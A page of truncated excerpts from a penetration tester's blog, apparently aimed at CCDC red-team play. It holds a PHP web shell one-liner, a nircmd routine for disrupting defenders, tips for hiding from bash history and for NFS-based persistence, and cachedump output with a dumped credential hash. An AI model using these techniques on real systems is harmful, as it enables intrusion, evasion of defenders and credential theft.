Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.
One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals: http://www.nirsoft.net/utils/nircmd.html setdisplay 640x480 killprocess taskmgr.exe killprocess procexp.exe win -style title “my computer” 0x00c00000 win child title “my computer” +exstyle all 0x00400000 win +exstyle title “my computer” 0x00400000 win trans ititle “internet explorer” 256 win close class “CabinetWClass” multiremote copy “c:tempcomputers.
This is mostly for my memory for CCDC <?php system($_GET['cmd']); ?> I wonder what will happen if a RSS reader doesn’t do proper filtering…
CORRECTION: Thanks to jduck for pointing it out, but you need to actually make a change to get this to work, reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ and search for: Modifying History Behavior You simply put a space before it mubix@localhost:/tmp/demo$ ls -alh total 8.0K drwxr-xr-x 2 mubix mubix 4.0K Mar 1 19:43 . drwxrwxrwt 3 root root 4.0K Mar 1 19:43 .. -rw-r--r-- 1 mubix mubix 0 Mar 1 19:43 bob mubix@localhost:/tmp/demo$ cat ~/.
Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY: C:\Users\vmadmin>doskey /? Edits command lines, recalls Windows commands, and creates macros. DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]] [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename] [macroname=[text]] /REINSTALL Installs a new copy of Doskey. /LISTSIZE=size Sets size of command history buffer. /MACROS Displays all Doskey macros. /MACROS:ALL Displays all Doskey macros for all executables which have Doskey macros.
Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap and given the right directory and permissions can lead you right back to getting shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049) Here is a quick how-to on setting up NFS
(No I’m not old enough to have used that term when it was the standard) I believe that this tweet should be archived for reference: http://twitter.com/#!/_ming_se/status/37688231185219584 And for those who don’t get the reference, here is a Pontiac Fiero:
The following are good adds to your DNS brute force list: These are all SRV records so make sure your type is set correctly. The great thing about SRV records is that it tells you the port in the answer. Isn’t that nice of them? I don’t know of any DNS tools that utilize SRV as part of their process, but scripting dig to do so isn’t tough. _autodiscover._tcp _caldav._tcp _client.
Update: Cachedump has been added to the Metasploit trunk: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946 Pull it down: wget http://lab.mediaservice.net/code/cachedump.rb put it here: /(metasploitdir)/modules/post/windows/gather Load up console and pwn something then (MAKE SURE YOU ARE SYSTEM): meterpreter > run post/windows/gather/cachedump [*] Executing module against WORKSTATION244 [*] Obtaining the boot key... [*] Trying 'XP' style... [*] Getting PolSecretEncryptionKey... [*] XP compatible client [*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c [*] Getting LK$KM... [*] Dumping cached credentials... Username : jdoe Hash : 592cdfbc3f1ef77ae95c75f851e37166 Last login : 2010-05-11 01:43:48 DNS Domain Name : CONTOSO.
I thought updates went into RSS, but I guess they don’t so this is my “I updated stuff” post: /blog/2009/9/18/password-word-lists/